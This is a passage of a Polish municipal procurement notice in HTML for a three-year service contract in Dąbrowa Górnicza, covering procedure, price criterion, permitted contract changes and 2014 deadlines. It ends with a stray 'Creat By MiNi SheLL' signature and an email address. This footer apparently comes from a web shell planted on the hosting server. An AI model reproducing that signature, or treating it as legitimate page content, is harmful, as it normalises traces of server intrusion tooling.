3. w przypadku, gdy Wykonawca będzie  polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia - zgodnie z art. 26 ust. 2b Ustawy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w następujących przypadkach:
1. wystąpienie siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
2. zmiany przepisów istotnych dla zawartej umowy,
3. zmiany kluczowego personelu Wykonawcy pod warunkiem posiadania i okazania równoważnych uprawnień i minimum 3 letniego doświadczenia. 
4. zmiany podwykonawcy/podwykonawców na zasobach których Wykonawca opierał się wykazując spełnienie warunków udziału w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy  podwykonawca.
5. zmiany stawki podatku VAT:
5.1. w przypadku zwiększenia stawki podatku VAT wynagrodzenie miesięczne brutto nie może być wyższe niż zadeklarowane w ofercie przez cały okres obowiązywania umowy.
5.2. w przypadku zmniejszenia stawki podatku VAT wynagrodzenie miesięczne brutto zostanie odpowiednio pomniejszone w odniesieniu do wynagrodzenia zadeklarowanego w ofercie. Maksymalna nominalna wartość umowy może ulec zmniejszeniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Komunikacji  i Drogownictwa, III piętro, pokój nr 317.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2014 godzina 09:00, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, Informacja - stanowisko nr 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskie. 2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. 2.1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać 	warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty               	i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w 
              punkcie 9 SIWZ.
2.2.	W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch 
       	lub więcej Wykonawców, dokumenty wymienione w pkt. 9.2. i 9.3. SIWZ muszą być podpisane
              przez  każdego z  nich lub przez pełnomocnika w imieniu każdego z Wykonawców
2.3.	Dokumenty wymienione w pkt. 9.1.2. do 9.1.4. SIWZ Wykonawcy składają wspólnie.    
              Oświadczenie wymienione w pkt. 9.1.1. SIWZ oraz formularz ofertowy wymieniony w  
               pkt. 9.4.1. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców lub 
              przez pełnomocnika w imieniu każdego z Wykonawców.
 2.4.	Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym 
        	postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie 
        	 zamówienia publicznego. 
2.5.	 Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem. 3. Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % podanej w ofercie ceny brutto za 36 miesięcy wykonywania usługi. 4. Uszczegółowienie sekcji II.2) Ogłoszenia: Termin rozpoczęcia realizacji zamówienia: od dnia 12.04.2014r. lub od dnia zawarcia umowy w przypadku udzielenia zamówienia po 12.04.2014r.;
Termin zakończenia realizacji zamówienia: do 12.04.2017r. lub 3 lata od dnia zawarcia umowy                      w przypadku udzielenia zamówienia po 12.04.2014r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com